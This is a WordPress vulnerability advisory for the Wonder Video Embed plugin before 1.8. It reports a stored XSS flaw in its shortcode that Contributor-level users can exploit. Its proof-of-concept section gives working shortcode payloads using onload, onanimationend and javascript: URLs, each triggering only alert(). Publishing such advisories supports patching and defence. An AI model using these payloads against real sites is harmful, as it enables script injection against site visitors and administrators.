WordPress Plugin Vulnerabilities
Wonder Video Embed < 1.8 - Contributor+ Stored XSS
Description
The plugin does not escape parameters of its wonderplugin_video shortcode, which could allow users with a role as low as Contributor to perform Stored XSS attacks.
Proof of Concept
[wonderplugin_video iframe='youtube.com?v=dQw4w9WgXcQ" onload="alert(1)' videocss='animation-name:twentytwentyone-close-button-transition" onanimationend="alert(2)'] [wonderplugin_video iframe="javascript:alert('wistia')"] [wonderplugin_video videotype="mp4" lightbox="a" mp4="javascript:alert(3)" videowidth="100" videoheight="100" webm='" style="animation-name:twentytwentyone-close-button-transition;display:block;width:100px;height:100px;" onanimationend="alert(4)']
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-07-19 (about 2 years ago)
Added
2021-07-19 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)